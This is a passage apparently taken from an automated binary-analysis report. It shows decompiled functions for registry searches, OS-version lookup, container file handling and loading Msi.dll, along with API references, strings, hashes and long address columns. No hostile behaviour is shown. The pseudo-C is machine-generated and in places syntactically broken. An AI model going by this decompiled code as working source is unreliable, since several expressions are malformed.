						_push("Failed to set variable.");
						L10:
						_push(_t69);
						E00430A57();
						goto L18;
					}
					if( *((intOrPtr*)(_t57 + 0x20)) == 0) {
						goto L15;
					}
					_t69 = E00403A92(_a8,  *((intOrPtr*)(_t57 + 0x20)),  &_v12, 0);
					if(_t69 >= 0) {
						_t53 = RegQueryValueExW(_v16, _v12, 0,  &_v20, 0, 0);
						_t62 = _t53;
						if(_t62 == 0) {
							goto L15;
						}
						if(_t62 == 0) {
							_push(_v12);
							E00430F28(2, "Registry value not found. Key = \'%ls\', Value = \'%ls\'", _v8);
							_t73 = _t73 + 0x10;
							goto L14;
						}
						if(_t53 == 0) {
							goto L15;
						}
						_t72 =  <=  ? _t53 : _t53 & 0x0000ffff | 0x80070000;
						_t69 =  >=  ? 0x80004005 :  <=  ? _t53 : _t53 & 0x0000ffff | 0x80070000;
						E004300D9(0x80004005, "search.cpp", 0x30f, _t69);
						_push("Failed to query registry key value.");
						goto L10;
					}
					_push("Failed to format value string.");
					goto L10;
				}
				_push("Failed to format key string.");
				goto L10;
			}













                                                                                                                                                                  0x0040628d
                                                                                                                                                                  0x00406296
                                                                                                                                                                  0x004062a1
                                                                                                                                                                  0x004062a5
                                                                                                                                                                  0x004062af
                                                                                                                                                                  0x004062b5
                                                                                                                                                                  0x004062b8
                                                                                                                                                                  0x004062bb
                                                                                                                                                                  0x004062c7
                                                                                                                                                                  0x004062e5
                                                                                                                                                                  0x004062e9
                                                                                                                                                                  0x0040638a
                                                                                                                                                                  0x00406393
                                                                                                                                                                  0x004063c5
                                                                                                                                                                  0x004063ca
                                                                                                                                                                  0x004063cb
                                                                                                                                                                  0x004063d0
                                                                                                                                                                  0x004063d3
                                                                                                                                                                  0x004063d5
                                                                                                                                                                  0x004063d7
                                                                                                                                                                  0x004063e2
                                                                                                                                                                  0x004063e7
                                                                                                                                                                  0x004063ea
                                                                                                                                                                  0x004063ee
                                                                                                                                                                  0x004063f3
                                                                                                                                                                  0x004063f3
                                                                                                                                                                  0x004063fc
                                                                                                                                                                  0x00406401
                                                                                                                                                                  0x00406401
                                                                                                                                                                  0x0040640a
                                                                                                                                                                  0x0040640f
                                                                                                                                                                  0x0040640f
                                                                                                                                                                  0x0040641b
                                                                                                                                                                  0x0040641b
                                                                                                                                                                  0x00406395
                                                                                                                                                                  0x0040639a
                                                                                                                                                                  0x0040639c
                                                                                                                                                                  0x004063a1
                                                                                                                                                                  0x004063a4
                                                                                                                                                                  0x004063a4
                                                                                                                                                                  0x004063a6
                                                                                                                                                                  0x004063aa
                                                                                                                                                                  0x004063b8
                                                                                                                                                                  0x004063bc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004063be
                                                                                                                                                                  0x00406369
                                                                                                                                                                  0x00406369
                                                                                                                                                                  0x0040636a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00406370
                                                                                                                                                                  0x004062f3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040630a
                                                                                                                                                                  0x0040630e
                                                                                                                                                                  0x00406327
                                                                                                                                                                  0x0040632f
                                                                                                                                                                  0x00406332
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00406336
                                                                                                                                                                  0x00406373
                                                                                                                                                                  0x00406380
                                                                                                                                                                  0x00406385
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00406385
                                                                                                                                                                  0x0040633a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00406347
                                                                                                                                                                  0x00406351
                                                                                                                                                                  0x0040635f
                                                                                                                                                                  0x00406364
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00406364
                                                                                                                                                                  0x00406310
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00406310
                                                                                                                                                                  0x004062c9
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 004062BE
                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 00406305
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,000000F8,000000F8,00000000,000000F8), ref: 0040640F
                                                                                                                                                                  Strings
                                                                                                                                                                  • search.cpp, xrefs: 0040635A
                                                                                                                                                                  • Failed to format key string., xrefs: 004062C9
                                                                                                                                                                  • Failed to format value string., xrefs: 00406310
                                                                                                                                                                  • Registry value not found. Key = '%ls', Value = '%ls', xrefs: 00406379
                                                                                                                                                                  • RegistrySearchExists failed: ID '%ls', HRESULT 0x%x, xrefs: 004063DB
                                                                                                                                                                  • Failed to set variable., xrefs: 004063BE
                                                                                                                                                                  • Failed to query registry key value., xrefs: 00406364
                                                                                                                                                                  • Registry key not found. Key = '%ls', xrefs: 00406395
                                                                                                                                                                  • Failed to open registry key. Key = '%ls', xrefs: 004063C5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Open@16$Close
                                                                                                                                                                  • String ID: Failed to format key string.$Failed to format value string.$Failed to open registry key. Key = '%ls'$Failed to query registry key value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchExists failed: ID '%ls', HRESULT 0x%x$search.cpp
                                                                                                                                                                  • API String ID: 2348241696-46557908
                                                                                                                                                                  • Opcode ID: 92fe179a015c548b4d30b61766c10e2e3b9a11aa8ed6f21fc85f9485cfada65a
                                                                                                                                                                  • Instruction ID: 77e6a505d1c92e640da6a25a527f16b36357aa78925d8139f6e8a13f339cf427
                                                                                                                                                                  • Opcode Fuzzy Hash: 92fe179a015c548b4d30b61766c10e2e3b9a11aa8ed6f21fc85f9485cfada65a
                                                                                                                                                                  • Instruction Fuzzy Hash: 9941F331E00214BBDF15AE95CC02BAEBAA5AF48310F11417BFD01B51D1D7798E20AAD8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004031B4, Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 131libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 47%
                                                                                                                                                                  			E004031B4(void* __ecx, signed int __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed short _v16;
				signed short _v284;
				signed short _v288;
				char _v292;
				struct HINSTANCE__* _v296;
				signed short _v300;
				intOrPtr _v308;
				signed int _v312;
				signed int _v316;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				struct HINSTANCE__** _t34;
				signed short _t35;
				signed short _t38;
				signed short _t48;
				signed short _t53;
				signed short _t55;
				signed short _t58;
				signed int _t70;
				void* _t71;
				signed int* _t72;
				signed short _t74;
				signed short _t77;
				signed int _t81;

				_t70 = __edx;
				_t29 =  *0x4560d0; // 0xae480e18
				_v8 = _t29 ^ _t81;
				_t61 = _a8;
				_v296 = 0;
				E004267C0(_a8, __ecx, _t71, 0, __eflags);
				_t72 =  &_v316;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t34 =  &_v296;
				__imp__GetModuleHandleExW(0, L"ntdll", _t34,  &_v292, 0, 0x11c);
				if(_t34 != 0) {
					_t35 = GetProcAddress(_v296, "RtlGetVersion");
					__eflags = _t35;
					if(_t35 != 0) {
						_v292 = 0x11c;
						_t74 =  *_t35( &_v292);
						__eflags = _t74;
						if(_t74 >= 0) {
							_t38 = _a4 - 1;
							__eflags = _t38;
							if(_t38 == 0) {
								L12:
								_t21 =  &_v316;
								 *_t21 = _v316 & 0x00000000;
								__eflags =  *_t21;
								asm("cdq");
								_v308 = 3;
								_v312 = (_v288 & 0x0000ffff) << 0x00000010 | _v284 & 0x0000ffff;
								L13:
								_t74 = E00418BE2( &_v316, _t61);
								__eflags = _t74;
								if(_t74 >= 0) {
									goto L16;
								}
								_push("Failed to set variant value.");
								goto L15;
							}
							_t48 = _t38 - 1;
							__eflags = _t48;
							if(_t48 == 0) {
								_v300 = _v300 & 0x00000000;
								E00432058( &_v292, GetCurrentProcess(),  &_v300);
								__eflags = _v300;
								if(_v300 == 0) {
									goto L13;
								}
								goto L12;
							}
							__eflags = _t48 == 1;
							if(_t48 == 1) {
								_t53 = _v16;
								__eflags = 0 - _t53;
								if(0 != _t53) {
									asm("cdq");
									_v316 = _t53 & 0x0000ffff;
									_v312 = _t70;
									_v308 = 1;
								}
							}
							goto L13;
						}
						_push("Failed to get OS info.");
						goto L15;
					}
					_t55 = GetLastError();
					__eflags = _t55;
					_t77 =  <=  ? _t55 : _t55 & 0x0000ffff | 0x80070000;
					__eflags = _t77;
					_t74 =  >=  ? 0x80004005 : _t77;
					E004300D9(0x80004005, "variable.cpp", 0x57b, _t74);
					_push("Failed to locate RtlGetVersion.");
					goto L15;
				} else {
					_t58 = GetLastError();
					_t80 =  <=  ? _t58 : _t58 & 0x0000ffff | 0x80070000;
					_t74 =  >=  ? 0x80004005 :  <=  ? _t58 : _t58 & 0x0000ffff | 0x80070000;
					E004300D9(0x80004005, "variable.cpp", 0x575, _t74);
					_push("Failed to locate NTDLL.");
					L15:
					_push(_t74);
					E00430A57();
					L16:
					if(_v296 != 0) {
						FreeLibrary(_v296);
					}
					return L004267AF(_t74, _v8 ^ _t81, _t72, _t74);
				}
			}






























                                                                                                                                                                  0x004031b4
                                                                                                                                                                  0x004031bd
                                                                                                                                                                  0x004031c4
                                                                                                                                                                  0x004031c8
                                                                                                                                                                  0x004031dc
                                                                                                                                                                  0x004031e2
                                                                                                                                                                  0x004031e9
                                                                                                                                                                  0x004031ef
                                                                                                                                                                  0x004031f0
                                                                                                                                                                  0x004031f1
                                                                                                                                                                  0x004031f5
                                                                                                                                                                  0x004031f6
                                                                                                                                                                  0x00403203
                                                                                                                                                                  0x0040320b
                                                                                                                                                                  0x00403250
                                                                                                                                                                  0x00403256
                                                                                                                                                                  0x00403258
                                                                                                                                                                  0x00403299
                                                                                                                                                                  0x004032a5
                                                                                                                                                                  0x004032a7
                                                                                                                                                                  0x004032a9
                                                                                                                                                                  0x004032b8
                                                                                                                                                                  0x004032b8
                                                                                                                                                                  0x004032b9
                                                                                                                                                                  0x0040330b
                                                                                                                                                                  0x0040331e
                                                                                                                                                                  0x0040331e
                                                                                                                                                                  0x0040331e
                                                                                                                                                                  0x00403325
                                                                                                                                                                  0x00403326
                                                                                                                                                                  0x00403330
                                                                                                                                                                  0x00403336
                                                                                                                                                                  0x00403343
                                                                                                                                                                  0x00403345
                                                                                                                                                                  0x00403347
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00403349
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00403349
                                                                                                                                                                  0x004032bb
                                                                                                                                                                  0x004032bb
                                                                                                                                                                  0x004032bc
                                                                                                                                                                  0x004032e8
                                                                                                                                                                  0x004032fd
                                                                                                                                                                  0x00403302
                                                                                                                                                                  0x00403309
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00403309
                                                                                                                                                                  0x004032be
                                                                                                                                                                  0x004032bf
                                                                                                                                                                  0x004032c1
                                                                                                                                                                  0x004032c7
                                                                                                                                                                  0x004032ca
                                                                                                                                                                  0x004032cf
                                                                                                                                                                  0x004032d0
                                                                                                                                                                  0x004032d6
                                                                                                                                                                  0x004032dc
                                                                                                                                                                  0x004032dc
                                                                                                                                                                  0x004032ca
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004032bf
                                                                                                                                                                  0x004032ab
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004032ab
                                                                                                                                                                  0x0040325a
                                                                                                                                                                  0x00403269
                                                                                                                                                                  0x0040326b
                                                                                                                                                                  0x00403273
                                                                                                                                                                  0x00403275
                                                                                                                                                                  0x00403283
                                                                                                                                                                  0x00403288
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040320d
                                                                                                                                                                  0x0040320d
                                                                                                                                                                  0x0040321e
                                                                                                                                                                  0x00403228
                                                                                                                                                                  0x00403236
                                                                                                                                                                  0x0040323b
                                                                                                                                                                  0x0040334e
                                                                                                                                                                  0x0040334e
                                                                                                                                                                  0x0040334f
                                                                                                                                                                  0x00403356
                                                                                                                                                                  0x0040335d
                                                                                                                                                                  0x00403365
                                                                                                                                                                  0x00403365
                                                                                                                                                                  0x0040337b
                                                                                                                                                                  0x0040337b

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,ntdll,?), ref: 00403203
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040320D
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,RtlGetVersion), ref: 00403250
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040325A
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000000,?), ref: 00403365
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$AddressFreeHandleLibraryModuleProc
                                                                                                                                                                  • String ID: Failed to get OS info.$Failed to locate NTDLL.$Failed to locate RtlGetVersion.$Failed to set variant value.$RtlGetVersion$ntdll$variable.cpp
                                                                                                                                                                  • API String ID: 3057421322-109962352
                                                                                                                                                                  • Opcode ID: 9e0124d37f273bc032000de51e3c5cea7de257848c4fe8a0ef6f03f4a23bcf81
                                                                                                                                                                  • Instruction ID: 7c8cdbe08d43eea22cdbe99aa2ae2b22f00f283c4789ca0ae23ce7a78345e865
                                                                                                                                                                  • Opcode Fuzzy Hash: 9e0124d37f273bc032000de51e3c5cea7de257848c4fe8a0ef6f03f4a23bcf81
                                                                                                                                                                  • Instruction Fuzzy Hash: B241A731901638ABDB249F659C467EABAF8EB08705F1001ABFD44F6180DB789F45CA9D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00418F44, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 128fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 55%
                                                                                                                                                                  			E00418F44(HANDLE* _a4, intOrPtr _a8, void* _a12, WCHAR* _a16) {
				void* _t29;
				union _LARGE_INTEGER* _t33;
				signed short _t40;
				signed short _t43;
				void* _t47;
				signed short _t48;
				HANDLE* _t51;
				intOrPtr _t52;
				long _t56;
				union _LARGE_INTEGER _t68;

				_t52 = _a8;
				_t51 = _a4;
				_t3 = _t52 + 4; // 0xf44d89c8
				_t51[6] =  *_t3;
				_t5 = _t52 + 0x18; // 0x195
				_t51[4] =  *_t5;
				_t7 = _t52 + 0x1c; // 0x2f07d83
				_t51[5] =  *_t7;
				_t9 = _t52 + 0x40; // 0x50e0458d
				_t56 = 0;
				_t51[2] =  *_t9;
				_t12 = _t52 + 0x44; // 0xfff875ff
				_t68 = 0;
				_t51[3] =  *_t12;
				if(_a12 != 0xffffffff) {
					_t29 = GetCurrentProcess();
					if(DuplicateHandle(GetCurrentProcess(), _a12, _t29, _t51, 0, 0, 2) != 0) {
						_t68 = 0;
						goto L7;
					} else {
						_t43 = GetLastError();
						_t63 =  <=  ? _t43 : _t43 & 0x0000ffff | 0x80070000;
						_t56 =  >=  ? 0x80004005 :  <=  ? _t43 : _t43 & 0x0000ffff | 0x80070000;
						E004300D9(0x80004005, "container.cpp", 0xe7, _t56);
						_push(_a16);
						_push("Failed to duplicate handle to container: %ls");
						goto L5;
					}
				} else {
					_t47 = CreateFileW(_a16, 0x80000000, 1, 0, 3, 0x8000080, 0);
					 *_t51 = _t47;
					if(_t47 != 0xffffffff) {
						L7:
						if( *((intOrPtr*)(_a8 + 0xc)) == _t56) {
							_t33 = _t56;
						} else {
							_t68 = _t51[2];
							_t33 = _t51[3];
						}
						_push(_t56);
						if(SetFilePointerEx( *_t51, _t68, _t33, _t56) != 0) {
							if(_t51[6] == 1) {
								_t56 = E004240D7(_t51, _a16);
								if(_t56 < 0) {
									_push("Failed to open container.");
									goto L15;
								}
							}
						} else {
							_t40 = GetLastError();
							_t60 =  <=  ? _t40 : _t40 & 0x0000ffff | 0x80070000;
							_t56 =  >=  ? 0x80004005 :  <=  ? _t40 : _t40 & 0x0000ffff | 0x80070000;
							E004300D9(0x80004005, "container.cpp", 0xf3, _t56);
							_push("Failed to move file pointer to container offset.");
							L15:
							_push(_t56);
							E00430A57();
						}
					} else {
						_t48 = GetLastError();
						_t66 =  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
						_t56 =  >=  ? 0x80004005 :  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
						E004300D9(0x80004005, "container.cpp", 0xe1, _t56);
						_push(_a16);
						_push("Failed to open file: %ls");
						L5:
						_push(_t56);
						E00430A57();
					}
				}
				return _t56;
			}













                                                                                                                                                                  0x00418f47
                                                                                                                                                                  0x00418f4b
                                                                                                                                                                  0x00418f4e
                                                                                                                                                                  0x00418f51
                                                                                                                                                                  0x00418f54
                                                                                                                                                                  0x00418f57
                                                                                                                                                                  0x00418f5a
                                                                                                                                                                  0x00418f5d
                                                                                                                                                                  0x00418f60
                                                                                                                                                                  0x00418f65
                                                                                                                                                                  0x00418f6b
                                                                                                                                                                  0x00418f6e
                                                                                                                                                                  0x00418f71
                                                                                                                                                                  0x00418f73
                                                                                                                                                                  0x00418f76
                                                                                                                                                                  0x00418fdf
                                                                                                                                                                  0x00418ff0
                                                                                                                                                                  0x00419033
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00418ff2
                                                                                                                                                                  0x00418ff2
                                                                                                                                                                  0x00419003
                                                                                                                                                                  0x0041900d
                                                                                                                                                                  0x0041901b
                                                                                                                                                                  0x00419020
                                                                                                                                                                  0x00419023
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419023
                                                                                                                                                                  0x00418f78
                                                                                                                                                                  0x00418f8b
                                                                                                                                                                  0x00418f91
                                                                                                                                                                  0x00418f96
                                                                                                                                                                  0x00419035
                                                                                                                                                                  0x0041903b
                                                                                                                                                                  0x00419045
                                                                                                                                                                  0x0041903d
                                                                                                                                                                  0x0041903d
                                                                                                                                                                  0x00419040
                                                                                                                                                                  0x00419040
                                                                                                                                                                  0x00419047
                                                                                                                                                                  0x00419055
                                                                                                                                                                  0x00419090
                                                                                                                                                                  0x0041909b
                                                                                                                                                                  0x0041909f
                                                                                                                                                                  0x004190a1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004190a1
                                                                                                                                                                  0x0041909f
                                                                                                                                                                  0x00419057
                                                                                                                                                                  0x00419057
                                                                                                                                                                  0x00419068
                                                                                                                                                                  0x00419072
                                                                                                                                                                  0x00419080
                                                                                                                                                                  0x00419085
                                                                                                                                                                  0x004190a6
                                                                                                                                                                  0x004190a6
                                                                                                                                                                  0x004190a7
                                                                                                                                                                  0x004190ad
                                                                                                                                                                  0x00418f9c
                                                                                                                                                                  0x00418f9c
                                                                                                                                                                  0x00418fad
                                                                                                                                                                  0x00418fb7
                                                                                                                                                                  0x00418fc5
                                                                                                                                                                  0x00418fca
                                                                                                                                                                  0x00418fcd
                                                                                                                                                                  0x00419028
                                                                                                                                                                  0x00419028
                                                                                                                                                                  0x00419029
                                                                                                                                                                  0x0041902e
                                                                                                                                                                  0x00418f96
                                                                                                                                                                  0x004190b4

                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,00401F17,00000000,00000000,?,0041912F,004021A7,00401E27,00401F17,00402283), ref: 00418F8B
                                                                                                                                                                  • GetLastError.KERNEL32(?,0041912F,004021A7,00401E27,00401F17,00402283,00402283,00000000,00401F17,00000000), ref: 00418F9C
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000001,00000000,00000000,00000002,00401F17,00000000,00000000,?,0041912F,004021A7,00401E27,00401F17,00402283,00402283,00000000,00401F17), ref: 00418FDF
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(000000FF,00000000,?,0041912F,004021A7,00401E27,00401F17,00402283,00402283,00000000,00401F17,00000000), ref: 00418FE5
                                                                                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,0041912F,004021A7,00401E27,00401F17,00402283,00402283,00000000,00401F17,00000000), ref: 00418FE8
                                                                                                                                                                  • GetLastError.KERNEL32(?,0041912F,004021A7,00401E27,00401F17,00402283,00402283,00000000,00401F17,00000000), ref: 00418FF2
                                                                                                                                                                  • SetFilePointerEx.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,0041912F,004021A7,00401E27,00401F17,00402283,00402283,00000000,00401F17,00000000), ref: 0041904D
                                                                                                                                                                  • GetLastError.KERNEL32(?,0041912F,004021A7,00401E27,00401F17,00402283,00402283,00000000,00401F17,00000000), ref: 00419057
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
                                                                                                                                                                  • String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp
                                                                                                                                                                  • API String ID: 2619879409-2168299741
                                                                                                                                                                  • Opcode ID: 9fb42e0eb9429fd66eefd839e7e0d1a44353d45427f0474d1950670866a9dd9d
                                                                                                                                                                  • Instruction ID: 7416660654b34e50ad6095a59235e3d814afae6169e601bf21221cf26e7b1805
                                                                                                                                                                  • Opcode Fuzzy Hash: 9fb42e0eb9429fd66eefd839e7e0d1a44353d45427f0474d1950670866a9dd9d
                                                                                                                                                                  • Instruction Fuzzy Hash: BB419631200200AFEB209F2A9C55F5B7BE5EBC8760F21411AFD08DB291DB79DC11DBA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0043541A, Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 77libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                                                  			E0043541A(void* __ecx, void* __edx, void* __esi, void* __eflags) {
				signed int _v8;
				_Unknown_base(*)()* _t12;
				_Unknown_base(*)()* _t13;
				_Unknown_base(*)()* _t14;
				_Unknown_base(*)()* _t15;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr _t29;
				void* _t33;

				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t33 = E004300F0(__ecx, __edx, __eflags, L"Msi.dll", 0x457f04,  &_v8);
				if(_t33 >= 0) {
					E0043710A(_v8, 0x457f24, 0x457f28);
					_t12 = GetProcAddress( *0x457f04, "MsiDeterminePatchSequenceW");
					_t19 =  *0x457eec;
					_t20 =  ==  ? _t12 : _t19;
					 *0x457f08 = _t12;
					 *0x457eec =  ==  ? _t12 : _t19;
					_t13 = GetProcAddress( *0x457f04, "MsiEnumProductsExW");
					_t21 =  *0x457ef0;
					_t22 =  ==  ? _t13 : _t21;
					 *0x457f0c = _t13;
					 *0x457ef0 =  ==  ? _t13 : _t21;
					_t14 = GetProcAddress( *0x457f04, "MsiGetPatchInfoExW");
					_t23 =  *0x457ef4;
					_t24 =  ==  ? _t14 : _t23;
					 *0x457f10 = _t14;
					 *0x457ef4 =  ==  ? _t14 : _t23;
					_t15 = GetProcAddress( *0x457f04, "MsiGetProductInfoExW");
					_t25 =  *0x457ef8;
					_t26 =  ==  ? _t15 : _t25;
					 *0x457f14 = _t15;
					 *0x457ef8 =  ==  ? _t15 : _t25;
					_t16 = GetProcAddress( *0x457f04, "MsiSetExternalUIRecord");
					_t27 =  *0x457efc;
					_t28 =  ==  ? _t16 : _t27;
					 *0x457f18 = _t16;
					 *0x457efc =  ==  ? _t16 : _t27;
					_t17 = GetProcAddress( *0x457f04, "MsiSourceListAddSourceExW");
					_t29 =  *0x457f00;
					_t30 =  ==  ? _t17 : _t29;
					 *0x457f1c = _t17;
					 *0x457f00 =  ==  ? _t17 : _t29;
					 *0x457f20 = 1;
				}
				if(_v8 != 0) {
					E004380AB(_v8);
				}
				return _t33;
			}

















                                                                                                                                                                  0x0043541d
                                                                                                                                                                  0x0043541e
                                                                                                                                                                  0x00435436
                                                                                                                                                                  0x0043543a
                                                                                                                                                                  0x0043544e
                                                                                                                                                                  0x00435464
                                                                                                                                                                  0x00435466
                                                                                                                                                                  0x00435479
                                                                                                                                                                  0x0043547c
                                                                                                                                                                  0x00435481
                                                                                                                                                                  0x00435487
                                                                                                                                                                  0x00435489
                                                                                                                                                                  0x0043549c
                                                                                                                                                                  0x0043549f
                                                                                                                                                                  0x004354a4
                                                                                                                                                                  0x004354aa
                                                                                                                                                                  0x004354ac
                                                                                                                                                                  0x004354bf
                                                                                                                                                                  0x004354c2
                                                                                                                                                                  0x004354c7
                                                                                                                                                                  0x004354cd
                                                                                                                                                                  0x004354cf
                                                                                                                                                                  0x004354e2
                                                                                                                                                                  0x004354e5
                                                                                                                                                                  0x004354ea
                                                                                                                                                                  0x004354f0
                                                                                                                                                                  0x004354f2
                                                                                                                                                                  0x00435505
                                                                                                                                                                  0x00435508
                                                                                                                                                                  0x0043550d
                                                                                                                                                                  0x00435513
                                                                                                                                                                  0x00435515
                                                                                                                                                                  0x0043551d
                                                                                                                                                                  0x00435520
                                                                                                                                                                  0x00435525
                                                                                                                                                                  0x0043552b
                                                                                                                                                                  0x00435535
                                                                                                                                                                  0x0043553a
                                                                                                                                                                  0x0043553f
                                                                                                                                                                  0x0043553f
                                                                                                                                                                  0x00435548

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004300F0: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0043012F
                                                                                                                                                                    • Part of subcall function 004300F0: LoadLibraryW.KERNEL32(?,?,00000104,00401CC1), ref: 00430182
                                                                                                                                                                    • Part of subcall function 004300F0: GetLastError.KERNEL32 ref: 0043018E
                                                                                                                                                                    • Part of subcall function 0043710A: GetFileVersionInfoSizeW.VERSION(00401CE2,00000000,00000000,00000000,00000000,?,00401CE2), ref: 00437127
                                                                                                                                                                    • Part of subcall function 0043710A: GetLastError.KERNEL32(00401CE2,00000000,00000000,00000000,00000000,?,00401CE2), ref: 00437132
                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 00435464
                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 00435487
                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 004354AA
                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 004354CD
                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 004354F0
                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 00435513
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
